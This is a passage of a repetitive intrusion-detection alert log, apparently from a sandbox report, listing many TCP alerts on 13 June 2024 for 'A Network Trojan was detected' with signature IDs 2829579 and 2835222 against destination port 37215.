              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.675277
              SID:2829579
              Source Port:45618
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.026117
              SID:2835222
              Source Port:41382
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.054996
              SID:2835222
              Source Port:48594
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.017111
              SID:2835222
              Source Port:46312
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.407116
              SID:2829579
              Source Port:60834
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.783114
              SID:2829579
              Source Port:41832
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.088446
              SID:2835222
              Source Port:58836
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.486380
              SID:2835222
              Source Port:33318
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.028947
              SID:2829579
              Source Port:37212
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.371716
              SID:2829579
              Source Port:33084
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.799433
              SID:2829579
              Source Port:39916
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.423925
              SID:2829579
              Source Port:39680
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.092356
              SID:2829579
              Source Port:54386
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.731369
              SID:2835222
              Source Port:49204
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.323735
              SID:2835222
              Source Port:42772
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.420107
              SID:2835222
              Source Port:34104
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.211903
              SID:2829579
              Source Port:51108
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.834540
              SID:2835222
              Source Port:41324
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.758569
              SID:2835222
              Source Port:39482
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.633263
              SID:2835222
              Source Port:49174
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.089118
              SID:2835222
              Source Port:33108
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.277169
              SID:2829579
              Source Port:47158
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.654874
              SID:2835222
              Source Port:35520
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.677087
              SID:2835222
              Source Port:56290
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.217883
              SID:2829579
              Source Port:45636
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.456638
              SID:2835222
              Source Port:51006
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.248135
              SID:2835222
              Source Port:33544
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.376332
              SID:2829579
              Source Port:51876
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.755630
              SID:2835222
              Source Port:57432
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.475529
              SID:2835222
              Source Port:40058
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.507412
              SID:2829579
              Source Port:60502
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.306603
              SID:2829579
              Source Port:35900
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.476852
              SID:2835222
              Source Port:43908
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.654216
              SID:2835222
              Source Port:51518
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.133569
              SID:2829579
              Source Port:52674
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.177708
              SID:2835222
              Source Port:44970
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.751528
              SID:2829579
              Source Port:43690
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.268590
              SID:2835222
              Source Port:52160
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.608025
              SID:2829579
              Source Port:37968
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.670892
              SID:2829579
              Source Port:45982
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.731833
              SID:2835222
              Source Port:48746
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.822738
              SID:2829579
              Source Port:47684
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.870283
              SID:2835222
              Source Port:39334
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.677391
              SID:2829579
              Source Port:54460
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.508180
              SID:2829579
              Source Port:40926
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.405647
              SID:2835222
              Source Port:44982
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.302725
              SID:2835222
              Source Port:47850
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.460077
              SID:2829579
              Source Port:40770
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.244422
              SID:2829579
              Source Port:54062
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.191233
              SID:2829579
              Source Port:48828
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.317025
              SID:2829579
              Source Port:59442
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.869017
              SID:2835222
              Source Port:40552
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.093133
              SID:2829579
              Source Port:47610
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.672529
              SID:2835222
              Source Port:53494
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.453289
              SID:2835222
              Source Port:54294
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.298202
              SID:2829579
              Source Port:47244
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.247801
              SID:2835222
              Source Port:34328
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.125864
              SID:2835222
              Source Port:57662
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.137673
              SID:2835222
              Source Port:33454
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.484778
              SID:2829579
              Source Port:51554
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.106734
              SID:2829579
              Source Port:39248
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.509183
              SID:2835222
              Source Port:53194
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.977123
              SID:2835222
              Source Port:52588
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.110094
              SID:2829579
              Source Port:50840
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.867990
              SID:2829579
              Source Port:59156
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.276066
              SID:2835222
              Source Port:52806
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.931323
              SID:2835222
              Source Port:36166
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.040220
              SID:2829579
              Source Port:58006
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.212123
              SID:2835222
              Source Port:57680
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.155989
              SID:2835222
              Source Port:41940
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.726602
              SID:2829579
              Source Port:51568
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.131657
              SID:2835222
              Source Port:57274
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.409761
              SID:2829579
              Source Port:40384
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.246444
              SID:2829579
              Source Port:50458
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.477958
              SID:2835222
              Source Port:57206
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.549822
              SID:2829579
              Source Port:46592
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.830373
              SID:2835222
              Source Port:48316
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.943975
              SID:2829579
              Source Port:37060
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.634313
              SID:2829579
              Source Port:53276
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.272957
              SID:2829579
              Source Port:37338
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.695753
              SID:2835222
              Source Port:33080
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.708028
              SID:2829579
              Source Port:36794
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.154167
              SID:2829579
              Source Port:38692
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.160535
              SID:2829579
              Source Port:54434
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.729271
              SID:2835222
              Source Port:49890
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.949848
              SID:2829579
              Source Port:41242
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.996513
              SID:2835222
              Source Port:38020
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.420268
              SID:2835222
              Source Port:43092
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.404723
              SID:2835222
              Source Port:58772
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.501801
              SID:2835222
              Source Port:42380
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.611011
              SID:2829579
              Source Port:51626
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.654924
              SID:2835222
              Source Port:59958
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.457019
              SID:2829579
              Source Port:44676
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.672283
              SID:2829579
              Source Port:55596
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.264205
              SID:2829579
              Source Port:45082
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.630587
              SID:2829579
              Source Port:42246
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.341102
              SID:2829579
              Source Port:44614
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.056508
              SID:2829579
              Source Port:57018
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.093980
              SID:2829579
              Source Port:57286
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.224325
              SID:2829579
              Source Port:42212
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.099481
              SID:2835222
              Source Port:59766
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.307199
              SID:2829579
              Source Port:48358
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.990384
              SID:2829579
              Source Port:53386
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.753705
              SID:2835222
              Source Port:49924
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.570134
              SID:2829579
              Source Port:40178
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.243236
              SID:2829579
              Source Port:41406
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.526256
              SID:2829579
              Source Port:34100
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.546117
              SID:2835222
              Source Port:39872
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.970886
              SID:2829579
              Source Port:55380
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.213764
              SID:2829579
              Source Port:47380
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.175975
              SID:2829579
              Source Port:42446
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.871282
              SID:2835222
              Source Port:51298
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.935868
              SID:2835222
              Source Port:41152
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.012556
              SID:2835222
              Source Port:39988
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.057475
              SID:2835222
              Source Port:37892
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.131707
              SID:2829579
              Source Port:44520
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.407260
              SID:2835222
              Source Port:36852
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.487791
              SID:2829579
              Source Port:47224
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.937201
              SID:2835222
              Source Port:54880
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.041859
              SID:2829579
              Source Port:45122
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.174757
              SID:2829579
              Source Port:45158
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.224364
              SID:2835222
              Source Port:33594
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.571043
              SID:2835222
              Source Port:49532
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.501481
              SID:2829579
              Source Port:45316
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.835731
              SID:2835222
              Source Port:60890
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.177482
              SID:2829579
              Source Port:42980
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.196346
              SID:2835222
              Source Port:57616
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.834133
              SID:2829579
              Source Port:51512
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.914019
              SID:2835222
              Source Port:34242
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.262268
              SID:2829579
              Source Port:32990
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.316995
              SID:2835222
              Source Port:37882
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.870242
              SID:2835222
              Source Port:40856
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.830563
              SID:2835222
              Source Port:56970
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.476664
              SID:2835222
              Source Port:59822
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.486425
              SID:2829579
              Source Port:53978
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.099779
              SID:2835222
              Source Port:33092
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.228915
              SID:2829579
              Source Port:50080
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.403819
              SID:2835222
              Source Port:46266
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.784328
              SID:2835222
              Source Port:34764
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.111430
              SID:2829579
              Source Port:33764
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.835673
              SID:2835222
              Source Port:38458
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.544605
              SID:2829579
              Source Port:44840
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.936405
              SID:2835222
              Source Port:52822
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.224602
              SID:2829579
              Source Port:41802
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.822993
              SID:2829579
              Source Port:57978
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.137753
              SID:2829579
              Source Port:50514
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.224094
              SID:2829579
              Source Port:55856
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.253913
              SID:2835222
              Source Port:38742
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.458256
              SID:2835222
              Source Port:42706
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.302848
              SID:2835222
              Source Port:36300
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.614987
              SID:2835222
              Source Port:39396
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.240177
              SID:2835222
              Source Port:44412
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.128868
              SID:2829579
              Source Port:43250
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.969477
              SID:2835222
              Source Port:39556
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.089857
              SID:2829579
              Source Port:46242
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.108916
              SID:2829579
              Source Port:36346
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.677224
              SID:2835222
              Source Port:40792
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.308505
              SID:2829579
              Source Port:48636
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.213816
              SID:2829579
              Source Port:40222
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.346214
              SID:2835222
              Source Port:52012
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.750619
              SID:2835222
              Source Port:40760
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.408241
              SID:2829579
              Source Port:54718
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.154302
              SID:2835222
              Source Port:47158
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.130988
              SID:2835222
              Source Port:41422
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.782874
              SID:2835222
              Source Port:58692
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.456900
              SID:2829579
              Source Port:52402
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.248607
              SID:2829579
              Source Port:42714
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.264390
              SID:2835222
              Source Port:47750
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.093382
              SID:2829579
              Source Port:60954
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.755730
              SID:2829579
              Source Port:33066
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.572647
              SID:2829579
              Source Port:54268
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.322762
              SID:2835222
              Source Port:58034
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.091789
              SID:2835222
              Source Port:37696
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.702545
              SID:2829579
              Source Port:53840
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.436589
              SID:2835222
              Source Port:56660
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.696971
              SID:2829579
              Source Port:58018
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.172944
              SID:2835222
              Source Port:47932
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.544639
              SID:2829579
              Source Port:40822
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.504158
              SID:2835222
              Source Port:34642
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.993494
              SID:2835222
              Source Port:46990
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.727177
              SID:2835222
              Source Port:33218
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.149825
              SID:2835222
              Source Port:41566
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.221592
              SID:2835222
              Source Port:48674
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.697114
              SID:2835222
              Source Port:57406
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.801980
              SID:2829579
              Source Port:45286
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.194950
              SID:2835222
              Source Port:56340
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.181505
              SID:2835222
              Source Port:51690
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.484893
              SID:2829579
              Source Port:50212
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.213772
              SID:2835222
              Source Port:48158
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.554372
              SID:2835222
              Source Port:46856
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.439480
              SID:2835222
              Source Port:52954
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.945589
              SID:2829579
              Source Port:57396
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.757492
              SID:2835222
              Source Port:56010
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.131212
              SID:2829579
              Source Port:55948
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.913993
              SID:2835222
              Source Port:60852
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.174216
              SID:2835222
              Source Port:52772
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.275651
              SID:2829579
              Source Port:38682
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
